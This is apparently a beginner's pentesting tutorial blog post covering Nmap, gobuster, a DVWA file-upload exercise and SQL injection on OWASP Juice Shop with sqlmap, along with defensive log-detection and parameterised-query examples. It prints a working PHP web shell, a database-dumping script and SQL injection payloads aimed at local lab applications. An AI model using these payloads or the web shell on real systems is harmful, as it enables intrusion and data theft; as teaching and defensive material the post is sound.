Pentesting 101: Where to Start

META

Penetration testers are not "would-be hackers" but information security specialists who simulate real cyberattacks to discover weaknesses in systems. They are also called "ethical hackers" or "security testers," but the essence of their work is the same: they help companies protect themselves from potential threats while operating within the law.

My name is Ilya, and my path to pentesting began after extensive experience in web development. I currently work at Bright Security, where I develop the DAST (Dynamic Application Security Testing) system. This testing method finds vulnerabilities in real time by scanning the running application and analyzing how it behaves.

In this article, we'll explore how penetration testing works, learn the basics of tools like Nmap, Gobuster, and SQLMap, and even find a couple of vulnerabilities in the DVWA and OWASP Juice Shop applications. The article is for those who are interested in this field and want to practice. There is no promotion of courses here: the material is designed for readers with a basic understanding who are ready to dive into independent research.


Differences between hackers

Hackers are divided into several categories depending on their goals and methods:

  • Black Hat: act illegally, causing harm, stealing data, or seeking financial gain.
  • White Hat: operate legally, conduct penetration tests, and identify vulnerabilities to protect systems.
  • Grey Hat: use methods similar to Black Hats, but with the intent of improving security, even though their actions may fall into a legal gray area.

Main tasks of pentesting

Penetration testers are classified as white hats. Combining the skills of a programmer and a cybersecurity specialist, they perform the following tasks:

  1. Vulnerability detection: Identify weaknesses such as outdated components, weak passwords, and misconfigurations of network devices.
  2. Testing security mechanisms: assessing the effectiveness of existing security measures and their ability to resist unauthorized access.
  3. Threat simulation: Modeling the behavior of attackers in a controlled environment to test the system's response to potential attacks.
  4. Employee training: raising staff awareness of cyber threats and preparing them to respond to incidents.
  5. Compliance: Confirming that systems meet government security standards, which is especially important for industries with high data protection requirements.

Where to start if you want to become a penetration tester

Here's a quick list of basics to get you started:

  • IT and Networks: Learn the basics of operating systems (Linux, Windows) and networks (TCP/IP, HTTP, DNS).
  • Programming: Learn at least one language (such as Python, Ruby, or Crystal) to automate tasks and build tools.
  • Cybersecurity: Understand common vulnerabilities (SQL injection, XSS, CSRF) and the basics of cryptography.
  • Tools: Try Nmap, Wireshark, Metasploit, Burp Suite to help you with practical tasks.
  • Ethics and the law: Remember that penetration testing is only legal with the permission of the system owners. Ethics are the key to a successful career.
  • Practice: Use platforms like Hack The Box, TryHackMe, or VulnHub to practice your knowledge in real-world scenarios.

Additionally, there is a good article with a more detailed description of the necessary steps. Without further ado, let's get down to business.

Network Analysis with Nmap

Moving from theory to practice, let's consider one of the first steps of a pentest: network analysis. Imagine we only know the server's IP address. To understand which services are running on it and which ports are open, we can use the popular Nmap utility, which offers very broad functionality:

  • scanning open ports and identifying services running on them;
  • determination of operating systems and software versions;
  • identification of network filters and firewalls;
  • obtaining additional information about the target system.

I won't go into detail, but I'll demonstrate a few basic examples. See the official documentation for the rest.

Once Nmap is installed on your computer, you can scan your localhost. After scanning, the utility will display all open ports it found and the services running on them. In my case:

(screenshot: Nmap scan of localhost showing open ports and services)

If you add the -sV flag, Nmap provides much more information, including the versions of the applications behind the SSH and HTTP ports. Knowing which services (and which versions) are running on the target machine gives the penetration tester a "map" of potential attack points. If, for example, an old version of Apache or MySQL is detected, they can immediately check for known vulnerabilities and exploits for exactly those versions. This helps them choose tools and techniques more effectively, saves time, and makes testing more accurate.

(screenshot: Nmap -sV output with service versions)
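Reading service versions off a screenshot does not scale, so in practice the scan is saved as XML (nmap -sV -oX scan.xml) and parsed into an inventory that can be compared against known vulnerable versions. The following script is an added example for this article, not part of it or of Nmap: it parses a constructed sample of Nmap's XML format (the hosts, products and version numbers in it are invented) and lists every open port with the product and version Nmap fingerprinted, flagging ports where fingerprinting failed, since those are exactly the ones a defender still has to identify by hand.

```python
import xml.etree.ElementTree as ET

# Constructed sample of what `nmap -sV -oX scan.xml 127.0.0.1` writes.
# Hosts, products and versions are invented for this example.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 127.0.0.1">
  <host>
    <address addr="127.0.0.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.41"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="closed"/>
        <service name="mysql"/>
      </port>
      <port protocol="tcp" portid="31337">
        <state state="open"/>
        <service name="unknown"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_services(xml_text):
    """Return (host, port, service, product, version) for every port whose
    state nmap reported as 'open'. Closed/filtered ports are skipped."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            product = svc.get("product", "") if svc is not None else ""
            version = svc.get("version", "") if svc is not None else ""
            found.append((addr, int(port.get("portid")), name, product, version))
    return found


def report(xml_text):
    """One human-readable line per open port; unfingerprinted services are
    marked so they are not forgotten during the vulnerability review."""
    lines = []
    for addr, port, name, product, version in parse_services(xml_text):
        desc = " ".join(p for p in (product, version) if p)
        if not desc:
            desc = "(version unknown: identify manually)"
        lines.append(f"{addr}:{port}/{name} -> {desc}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_NMAP_XML)))
```

The same parser works on a real -oX file read from disk; only the open ports are reported, because the version inventory is what is later matched against vulnerability databases.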

Finding hidden directories with gobuster

If we have a potential target website, we know its homepage address and can check for hidden pages and directories on that domain. To find them, we can use gobuster, a good tool for enumerating directories on a website. There are many tools with similar functionality, such as dirb, dirsearch, and others. Gobuster works through a wordlist of candidate directory names, and many ready-made wordlists are available; for example, I used this one.

(screenshot: gobuster directory scan of localhost:31337)

Now we see that the service running on localhost:31337 is built on the WordPress CMS and also has a robots.txt file. For a more detailed analysis, we can find a WordPress-specific wordlist and repeat the scan.

(screenshot: gobuster scan with a WordPress wordlist)
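A wordlist scan like the one above is very visible from the server side: one client requests hundreds of paths that do not exist in a few seconds. The script below is an added example for this article (not part of it or of gobuster) showing how that pattern is detected in a web server access log. It parses constructed log lines in the Apache/nginx "combined" format and flags any source IP that produced a burst of 404 responses within a sliding time window; the "gobuster/3.6" user agent in the sample is a constructed value, since scanners can set any user agent they like, which is why the detection relies on the 404 burst rather than the user agent.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed "combined"-format access-log lines (not log data from the article).
# The burst from 10.0.0.9 imitates a wordlist scan; the other clients are normal.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2026:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Mar/2026:10:00:02 +0000] "GET /admin HTTP/1.1" 404 153 "-" "gobuster/3.6"
10.0.0.9 - - [01/Mar/2026:10:00:02 +0000] "GET /backup HTTP/1.1" 404 153 "-" "gobuster/3.6"
10.0.0.9 - - [01/Mar/2026:10:00:03 +0000] "GET /config HTTP/1.1" 404 153 "-" "gobuster/3.6"
10.0.0.9 - - [01/Mar/2026:10:00:03 +0000] "GET /.git HTTP/1.1" 404 153 "-" "gobuster/3.6"
10.0.0.9 - - [01/Mar/2026:10:00:04 +0000] "GET /uploads HTTP/1.1" 404 153 "-" "gobuster/3.6"
10.0.0.9 - - [01/Mar/2026:10:00:04 +0000] "GET /wp-admin HTTP/1.1" 301 0 "-" "gobuster/3.6"
10.0.0.9 - - [01/Mar/2026:10:00:05 +0000] "GET /robots.txt HTTP/1.1" 200 67 "-" "gobuster/3.6"
10.0.0.7 - - [01/Mar/2026:10:05:00 +0000] "GET /old-page HTTP/1.1" 404 153 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "path": m.group("path"),
            "status": int(m.group("status")), "ua": m.group("ua")}


def find_enumeration(log_text, window_s=60, min_404=5):
    """Flag source IPs with at least `min_404` 404 responses inside any
    `window_s`-second window. Returns {ip: summary} for the flagged IPs."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            by_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best, start = 0, 0
        # Two-pointer sliding window over the sorted timestamps.
        for end in range(len(recs)):
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_404:
            alerts[ip] = {
                "count_404": best,
                "distinct_paths": len({r["path"] for r in recs}),
                "user_agents": sorted({r["ua"] for r in recs}),
            }
    return alerts


if __name__ == "__main__":
    for ip, summary in find_enumeration(SAMPLE_LOG).items():
        print(ip, summary)
```

The thresholds are deliberately low for the sample; on a real site they should be tuned against normal 404 rates, and the same window logic can be applied to 403 or 301 responses, which wordlist scans also generate in bulk.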

Using Known Vulnerable Applications

To practice pentesting safely, intentionally vulnerable web applications are often used. They are deployed locally so that tools can be tested without any risk to real infrastructure. Below are some popular options:

DVWA (Damn Vulnerable Web App)

  • A classic educational application with intentionally introduced vulnerabilities (SQL Injection, XSS, CSRF, etc.).
  • Allows you to practice different levels of attack difficulty, from low to high.
  • GitHub
OWASP Juice Shop

  • "Online store" containing all possible vulnerability categories from the OWASP Top 10.
  • Built on a modern technology stack (Angular, Node.js).
  • GitHub
bWAPP (Buggy Web Application)

  • Another web application with many intentional bugs (from basic to advanced).
  • It has broad support for attacks, including those against mobile APIs.
  • Official website
WebGoat (OWASP Project)

  • A set of practical tasks on web security with examples of vulnerabilities.
  • It has a gamified format with step-by-step instructions for each vulnerability.
  • GitHub
Hackazon (Rapid7)

  • A web application that simulates an online store website and contains typical vulnerabilities.
  • Deployed locally to conduct various attack scenarios.
  • GitHub
VulnHub

  • Not a separate application, but a platform with ready-made virtual machines, each of which has a set of vulnerabilities.
  • Convenient for conducting full (end-to-end) pentests in a virtual environment.
  • Official website
Using the projects listed, you can develop skills in all the main aspects of pentesting: from simple SQL injections to more complex scenarios involving access rights and hidden services. Furthermore, many applications already have a list of vulnerabilities they contain, making it easier to choose which ones to practice with.

Uploading a malicious file to DVWA

Validating files uploaded to your server is critically important. If an attacker manages to upload a malicious file, they can easily access sensitive data, execute shell commands, download your website's database, and much more. Let's look at how this happens using DVWA as an example.

Installing DVWA

If you already have git and docker installed, installing DVWA is easy:

git clone https://github.com/digininja/DVWA.git
cd DVWA
docker compose up -d


After successful installation, go to http://localhost:4280/ and perform the initial configuration of the application.

Initial setup of DVWA

  1. Enter the login admin and the password password, then click "Login".
  2. On the main page, click "Create / Reset Database".
  3. Log in again.
  4. Go to http://localhost:4280/security.php and set the security level to "Low". This makes the application easier to attack for our purposes.

Demonstration of vulnerability

Let's go to the file upload page http://localhost:4280/vulnerabilities/upload/ and upload the PHP file malicious.php, which will execute shell commands passed via the cmd parameter:

<?php
// Runs whatever command is passed in the cmd parameter and returns its output
if (isset($_REQUEST['cmd'])) {
    echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}


Now, when you navigate to http://localhost:4280/hackable/uploads/malicious.php?cmd=pwd, you'll see the output of the pwd command. This means the file was uploaded to a web-accessible directory and executed as PHP, which is the vulnerability.

Advanced example: exporting a list of users

But a directory name printed by the server isn't much use on its own. Let's do something more interesting: for example, get the list of users from the database:

  1. Create a PHP file export_users.php with the following contents:
<?php
// Database connection settings (fill these in from the DVWA configuration files)
$host = '';
$db = '';
$user = '';
$pass = '';
$charset = 'utf8mb4';

$dsn = "mysql:host=$host;dbname=$db;charset=$charset";
// Connect to the database
$pdo = new PDO($dsn, $user, $pass);

// Query for all users
$stmt = $pdo->query("SELECT * FROM users");

// Fetch all rows and print them
$users = $stmt->fetchAll();
print_r($users);
exit;
?>


  2. Upload this file to the site using the same form and go to http://localhost:4280/hackable/uploads/export_users.php to see the result: a complete list of users from the DVWA database.
Yes, for this example we need to know the database connection details, but that's a technical matter. You can dig into the project's configuration files and find these variables yourself, or write your own PHP script that will pull this data from the server.

SQL injection on OWASP Juice Shop

SQL injection is one of the most critical and widespread vulnerabilities today. If a developer fails to validate and escape user input, but uses it directly in SQL queries, an attacker can inject their own code into the database query. This increases the risk of unauthorized access to data and, in the worst case, leads to complete system compromise. Let's look at the OWASP Juice Shop example.

Let's install Juice Shop

The documentation provides several installation options, but I'll choose the shortest one, via Docker.

docker pull bkimminich/juice-shop
docker run --rm -p 127.0.0.1:3000:3000 bkimminich/juice-shop


After successful installation, go to http://localhost:3000, where the application should be running.

Attack on the authorization form

On the Juice Shop login page, we have a form that is vulnerable to SQL injection. By default, the correct login and password can be found in the Juice Shop repository, but it's more interesting to test a typical SQL injection scenario.

Try entering the following in the login field: blablabla OR 1=1 -- , and any value (for example, 1234) in the password field. Despite the incorrect data, authorization succeeds. What happened?

  1. The logical part, OR 1=1: when the condition OR 1=1 appears in a database query string, it is always true. Thus the SQL injection "tricks" the validation by saying, "Return me the user if the login is 'blablabla' or the condition 1=1 holds." Since 1=1 is always true, the selection is no longer limited to a specific login.
  2. In SQL, the -- construct starts a comment that runs to the end of the line. Everything after -- is ignored by the database server, which cuts off the rest of the query syntax. Therefore, if the original query included a password check, it simply isn't performed, because it has been commented out.
As an exercise, you can try other string variations to test how responsive the login form is to SQL injections.
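Juice Shop stores its data in SQLite, so the mechanism above can be reproduced exactly with Python's built-in sqlite3 module. The block below is an added example for this article, not Juice Shop's code: it builds a constructed in-memory Users table, implements the login query twice, once by splicing the submitted e-mail into the SQL string (the vulnerable pattern) and once with bound parameters (the fix), and runs the same injected value through both. Note that the injected string has to close the open quote first, which is why the payload starts with a single quote; after that, OR 1=1 widens the match and -- comments out the password check, exactly as described above.

```python
import hashlib
import sqlite3


def _hash(password):
    # Constructed stand-in for the shop's password hashing.
    return hashlib.sha256(password.encode()).hexdigest()


def build_db():
    """In-memory stand-in for the shop's Users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, role TEXT)"
    )
    seed = [("admin@example.test", "admin123", "admin"),
            ("alice@example.test", "hunter2", "customer")]
    conn.executemany(
        "INSERT INTO Users (email, password, role) VALUES (?, ?, ?)",
        [(e, _hash(p), r) for e, p, r in seed],
    )
    return conn


def login_vulnerable(conn, email, password):
    """The broken pattern: untrusted text spliced into the SQL string.
    With email = "' OR 1=1 --" the query becomes
    ... WHERE email = '' OR 1=1 --' AND password = '<hash>'
    so the password clause is commented away and the first user is returned."""
    sql = (f"SELECT email, role FROM Users WHERE email = '{email}' "
           f"AND password = '{_hash(password)}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, email, password):
    """The fix: placeholders. The driver passes the values separately from the
    query text, so quotes and comment markers inside them are just characters."""
    sql = "SELECT email, role FROM Users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, _hash(password))).fetchone()


def demo():
    """Run the injected value through both implementations and a legitimate login."""
    conn = build_db()
    payload = "' OR 1=1 --"
    return {
        "vulnerable": login_vulnerable(conn, payload, "1234"),
        "safe": login_safe(conn, payload, "1234"),
        "legit": login_safe(conn, "admin@example.test", "admin123"),
    }


if __name__ == "__main__":
    for case, row in demo().items():
        print(f"{case:10s} -> {row}")
```

The vulnerable variant returns the admin row for a password that never matched anything; the parameterised variant returns nothing for the same input and still works for a real login, which is the behaviour the fix must preserve.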

Checking for SQL injection via SqlMap

I'd also like to briefly discuss another useful tool for SQL injection testing. SQLMap is a popular open-source tool designed to automate the process of detecting and exploiting SQL injection vulnerabilities. It can:

  1. Automatically detect vulnerability types (Boolean-based, Error-based, UNION-based, Blind SQL Injection, etc.).
  2. Extract database structure (names of databases, tables, columns).
  3. Execute commands (if the application's permissions are not configured correctly).
  4. Obtain hashed passwords and even (under certain conditions) crack them.
  5. And much more (for example, brute-force of certain parameters, bypassing WAF/IPS, etc.).

How to use SQLMap

On most modern Linux distributions, SQLMap can be installed from the standard package repositories:

sudo apt-get install sqlmap


To avoid specifying all the headers manually each time, let's write the request to the request.txt file:

POST /rest/user/login HTTP/1.1
Host: localhost:3000
Accept: application/json
Content-Type: application/json

{"email":"[email protected]","password":"password"}


Let's run sqlmap to analyze our query:

sqlmap -r request.txt --ignore-code=401,500 --level=2


-r request.txt passes the entire request from the file;

--ignore-code=401,500 tells sqlmap to ignore responses with status codes 401 and 500; in our case these would otherwise be treated as errors and sqlmap would not detect the SQL injection;

--level=2 enables additional tests (compared to level 1).

(screenshot: sqlmap output reporting the injectable parameter)

As you can see, sqlmap also found SQL injection, but used a different payload: ' AND CASE WHEN 4625=4625 THEN 4625 ELSE JSON(CHAR(114,71,84,66)) END AND 'teul'='teul

And if we increase the level parameter and add the risk parameter, sqlmap shows that the same SQL injection can also be found using a time-based technique.

(screenshot: sqlmap output with the time-based blind payload)

That is, in this case, 'OR 3714=LIKE(CHAR(65,66,67,68,69,70,71), UPPER(HEX(RANDOMBLOB(500000000/2))))-- LrCf is added.

Here, SQLMap invokes a long-running RANDOMBLOB(...) operation and measures whether the response is delayed. If the response is indeed delayed, this confirms a time-based blind SQL injection.
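From the defender's side, sqlmap's probes are recognisable in request logs long before it finishes: the CASE WHEN and RANDOMBLOB payloads shown above, CHAR() obfuscation, tautologies and trailing comment markers rarely appear in legitimate login requests. The script below is an added example for this article (not part of sqlmap or Juice Shop) that scans JSON request bodies logged for /rest/user/login for those signatures and for a sqlmap user agent. The request records, the user-agent strings and the benign requests are constructed; the two sqlmap payloads are the ones quoted above.

```python
import json
import re

# Signature patterns derived from the payloads quoted in the article.
SIGNATURES = [
    ("tautology", re.compile(r"\b(?:OR|AND)\s+\d+\s*=\s*\d+\b", re.I)),
    ("comment-terminator", re.compile(r"(?:^|['\s)])--|/\*")),
    ("case-when-probe", re.compile(r"\bCASE\s+WHEN\b", re.I)),
    ("char-obfuscation", re.compile(r"\bCHAR\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I)),
    ("sqlite-time-delay", re.compile(r"\bRANDOMBLOB\s*\(", re.I)),
]


def scan_value(text):
    """Names of every signature that matches one string value."""
    return [name for name, rx in SIGNATURES if rx.search(text)]


def walk_strings(obj):
    """Yield every string leaf of a decoded JSON document."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from walk_strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from walk_strings(v)


def scan_request(record):
    """Return the sorted list of indicators found in one logged request.
    `record` has 'ip', 'ua' and a raw JSON 'body' (constructed shape)."""
    hits = set()
    try:
        body = json.loads(record.get("body") or "null")
    except json.JSONDecodeError:
        body = record.get("body", "")   # malformed JSON: scan it as plain text
    for s in walk_strings(body):
        hits.update(scan_value(s))
    if "sqlmap" in record.get("ua", "").lower():
        hits.add("sqlmap-user-agent")
    return sorted(hits)


def triage(records):
    """(ip, indicators) for every request that triggered at least one signature."""
    out = []
    for r in records:
        hits = scan_request(r)
        if hits:
            out.append((r["ip"], hits))
    return out


# Constructed request log for /rest/user/login. Bodies are built with json.dumps
# so the quotes inside the payloads are escaped the way a real logger would.
SQLMAP_UA = "sqlmap/1.8 (https://sqlmap.org)"   # constructed user-agent value
SAMPLE_REQUESTS = [
    {"ip": "10.0.0.5", "ua": "Mozilla/5.0",
     "body": json.dumps({"email": "alice@example.test", "password": "hunter2"})},
    {"ip": "10.0.0.9", "ua": "Mozilla/5.0",
     "body": json.dumps({"email": "' OR 1=1 --", "password": "1234"})},
    {"ip": "10.0.0.9", "ua": SQLMAP_UA,
     "body": json.dumps({"email": "' AND CASE WHEN 4625=4625 THEN 4625 ELSE "
                                  "JSON(CHAR(114,71,84,66)) END AND 'teul'='teul",
                         "password": "x"})},
    {"ip": "10.0.0.9", "ua": SQLMAP_UA,
     "body": json.dumps({"email": "'OR 3714=LIKE(CHAR(65,66,67,68,69,70,71), "
                                  "UPPER(HEX(RANDOMBLOB(500000000/2))))-- LrCf",
                         "password": "x"})},
]

if __name__ == "__main__":
    for ip, hits in triage(SAMPLE_REQUESTS):
        print(ip, hits)
```

Signature matching of this kind is useful for alerting and for correlating a scan with the source IP, but it is not a substitute for the parameterised queries that remove the vulnerability; sqlmap's tamper scripts exist precisely to rewrite payloads past such filters.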

Conclusion

Penetration testing is a fascinating yet challenging field that requires practical skills and ongoing self-education. In this article, we covered the basics—from port scanning with Nmap to finding SQL injections with SQLMap. Now, to consolidate your knowledge and get started as a beginner, I recommend the following plan:

  1. Practice on intentionally vulnerable applications: use frameworks like DVWA, OWASP Juice Shop, bWAPP, and WebGoat. These platforms are designed specifically for safely practicing vulnerability hunting techniques.
  2. Master the basic pentest tools:
    • Nmap: for scanning networks and finding open ports.
    • Gobuster: for enumerating directories and detecting hidden resources.
    • SQLMap: for automated SQL injection detection.
    • Burp Suite: for web traffic analysis and modification.
    Additionally, explore alternatives such as OWASP ZAP, WFuzz, or GoBuster to expand your toolkit.
  3. Participate in online training and CTF competitions: Platforms like Hack The Box, TryHackMe, and VulnHub offer real-world attack scenarios where you can test and improve your skills in realistic conditions.
  4. Continuous self-education: regularly learn new techniques and vulnerabilities, stay up-to-date with cybersecurity news, and participate in professional communities. This will help you not only solidify your basic knowledge but also keep up with rapidly changing technologies.
If you feel ready for the next step, try your hand at Bug Bounty programs—it's a great way to test your skills on real projects and maybe even earn some money.
 